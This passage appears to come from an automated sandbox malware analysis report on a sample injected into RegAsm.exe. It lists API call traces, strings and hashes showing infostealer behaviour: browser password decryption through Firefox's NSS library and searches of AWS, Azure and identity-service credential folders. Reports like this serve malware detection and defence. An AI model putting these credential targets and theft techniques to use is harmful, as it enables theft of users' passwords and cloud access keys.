                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408700
                                                                                    • NSS_Shutdown.NSS3 ref: 00408706
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filelstrcpy$H_prologK11_lstrlen$HeapPointerSlotmemset$AllocAuthenticateBinaryCloseCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                    • String ID: passwords.txt
                                                                                    • API String ID: 2888107993-347816968
                                                                                    • Opcode ID: e3018b0a47374fec72a5f2baaef4059925a1376317702e7b48b131a6970e1429
                                                                                    • Instruction ID: 5dc14b0691de5214d02f3ee7ce5d944d84623a026e9eef8f831ba1c7c62f9796
                                                                                    • Opcode Fuzzy Hash: e3018b0a47374fec72a5f2baaef4059925a1376317702e7b48b131a6970e1429
                                                                                    • Instruction Fuzzy Hash: FAA16B72800169EFDB11EBE0DD49EAEBF7AFF19314F101439F611A21A1DB781A09CB65
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: kernel32.dll
                                                                                    • API String ID: 2238633743-1793498882
                                                                                    • Opcode ID: d69125541faeae41619a6b364ac2bacfc45b7a5b90ae5f2a75d772f0e7a26e50
                                                                                    • Instruction ID: 3b9a933638e78cfec0d7cf3ab61098210ea9312fa69d0c05088f71d6884a5f02
                                                                                    • Opcode Fuzzy Hash: d69125541faeae41619a6b364ac2bacfc45b7a5b90ae5f2a75d772f0e7a26e50
                                                                                    • Instruction Fuzzy Hash: 9F711A7E811620EFEB525FA0FD08A253BB7F70AB01B14713AEA05C6271E7764961EF14
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CC44801
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC44817
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC4482D
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4484A
                                                                                      • Part of subcall function 6CC6AB3F: EnterCriticalSection.KERNEL32(6CCBE370,?,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB49
                                                                                      • Part of subcall function 6CC6AB3F: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC33527,6CCBF6CC,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6AB7C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC4485F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC4487E
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4488B
                                                                                    • free.MOZGLUE(?), ref: 6CC4493A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC44956
                                                                                    • free.MOZGLUE(00000000), ref: 6CC44960
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4499A
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • free.MOZGLUE(?), ref: 6CC449C6
                                                                                    • free.MOZGLUE(?), ref: 6CC449E9
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC44812
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC44828
                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6CC44A42
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC447FC
                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6CC44A06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                    • API String ID: 1340022502-4194431170
                                                                                    • Opcode ID: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                                    • Instruction ID: 4528e45bac91a3110eb68051d6cd8346714f0730e06b1cc446e58ced7b74a6d5
                                                                                    • Opcode Fuzzy Hash: c3381fb728d657a909445ee7a91afa5542c2f4a8981e1473ae35045f146566d2
                                                                                    • Instruction Fuzzy Hash: B881F479A001008FDB00DFA9D89475A7775FF42328F24C629E916A7F41F731E895CBAA
                                                                                    APIs
                                                                                      • Part of subcall function 6CC44730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                                      • Part of subcall function 6CC44730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CC444BA
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CC444D2
                                                                                    • InitOnceExecuteOnce.KERNEL32(6CCBF80C,6CC3F240,?,?), ref: 6CC4451A
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CC4455C
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6CC44592
                                                                                    • InitializeCriticalSection.KERNEL32(6CCBF770), ref: 6CC445A2
                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6CC445AA
                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6CC445BB
                                                                                    • InitOnceExecuteOnce.KERNEL32(6CCBF818,6CC3F240,?,?), ref: 6CC44612
                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC44636
                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6CC44644
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC4466D
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC4469F
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446AB
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446B2
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446B9
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC446C0
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC446CD
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6CC446F1
                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CC446FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                    • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                    • API String ID: 1702738223-3894940629
                                                                                    • Opcode ID: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                                    • Instruction ID: 3e7a6c8b30bb29a77aa085271ec200a7b4c2a48b054c0c8ccb6636e1dfa86017
                                                                                    • Opcode Fuzzy Hash: c4df8e3795961a23628eba3a7e3a71347c9e7869bfcf190ca36711acefcf5791
                                                                                    • Instruction Fuzzy Hash: 2B6113B8A00248AFEB00CFE1CC49B957BB8EB46308F24C598E904AB751F7B19945CF55
                                                                                    APIs
                                                                                      • Part of subcall function 6CC77090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6CC7B9F1,?), ref: 6CC77107
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7E92D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EA4F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA5C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EA80
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EA8A
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CC7DCF5), ref: 6CC7EA92
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EB11
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB1E
                                                                                    • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6CC7EB3C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EB5B
                                                                                      • Part of subcall function 6CC75710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC7EB71), ref: 6CC757AB
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EBA4
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6CC7EBAC
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EBC1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000), ref: 6CC7EBCE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6CC7EBE5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,00000000), ref: 6CC7EC37
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EC46
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC7EC55
                                                                                    • free.MOZGLUE(00000000), ref: 6CC7EC5C
                                                                                    Strings
                                                                                    • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6CC7EA9B
                                                                                    • [I %d/%d] profiler_start, xrefs: 6CC7EBB4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                    • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                    • API String ID: 1341148965-1186885292
                                                                                    • Opcode ID: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                                    • Instruction ID: b960cb37aa5d12f64546b49e9ebe4fd28ef9813aa94d18133e6ad8fc90e20c31
                                                                                    • Opcode Fuzzy Hash: 92d745192a95e8bd1fec2b9da9d20eb111715bd3dbeffab84c153ca0725b3bf2
                                                                                    • Instruction Fuzzy Hash: FCA1373A7006148FDB109FA8C494BAABBB5FF86318F14402DE91997F51FB709845CBB5
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F70E
                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC7F8F9
                                                                                      • Part of subcall function 6CC46390: GetCurrentThreadId.KERNEL32 ref: 6CC463D0
                                                                                      • Part of subcall function 6CC46390: AcquireSRWLockExclusive.KERNEL32 ref: 6CC463DF
                                                                                      • Part of subcall function 6CC46390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC4640E
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F93A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F98A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F990
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F994
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F716
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                      • Part of subcall function 6CC3B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC3B5E0
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F739
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F746
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F793
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCB385B,00000002,?,?,?,?,?), ref: 6CC7F829
                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6CC7F84C
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CC7F866
                                                                                    • free.MOZGLUE(?), ref: 6CC7FA0C
                                                                                      • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                                      • Part of subcall function 6CC45E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                                      • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                                      • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                                      • Part of subcall function 6CC45E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                                      • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                                      • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                                      • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                                      • Part of subcall function 6CC45E60: GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                                      • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                                      • Part of subcall function 6CC45E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                                    • free.MOZGLUE(?), ref: 6CC7F9C5
                                                                                    • free.MOZGLUE(?), ref: 6CC7F9DA
                                                                                    Strings
                                                                                    • " attempted to re-register as ", xrefs: 6CC7F858
                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CC7F9A6
                                                                                    • Thread , xrefs: 6CC7F789
                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6CC7F71F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                    • API String ID: 882766088-1834255612
                                                                                    • Opcode ID: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                                    • Instruction ID: ef62768611038c41c543cf344f1f53f6099619e0f22c236f2ac275540298683b
                                                                                    • Opcode Fuzzy Hash: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                                    • Instruction Fuzzy Hash: 3D8113756046009FDB21DF64C880AAEB7B5FF85308F45852DE8499BB51FB31E849CBA2
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00416796
                                                                                    • memset.MSVCRT ref: 004167B6
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                    • lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                      • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                      • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                      • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                    • memset.MSVCRT ref: 00416834
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                    • lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                      • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                    • memset.MSVCRT ref: 004168B7
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004168E2
                                                                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004168FF
                                                                                      • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                      • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                    • memset.MSVCRT ref: 0041693A
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                    • API String ID: 2836893066-974132213
                                                                                    • Opcode ID: c58c534d700d359848532d575c73dd31abfa58791d620c81c5a56ac48601855f
                                                                                    • Instruction ID: 745e3daf2a537ab21df9589d501c2eabb87bb30e3b6ddd2dcbe1be6b1c91b76e
                                                                                    • Opcode Fuzzy Hash: c58c534d700d359848532d575c73dd31abfa58791d620c81c5a56ac48601855f
                                                                                    • Instruction Fuzzy Hash: 6B4195B1D0022CBADB11E7E4DC46EED777CAB1C704F40056FB554A3182DA7C97888B65
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
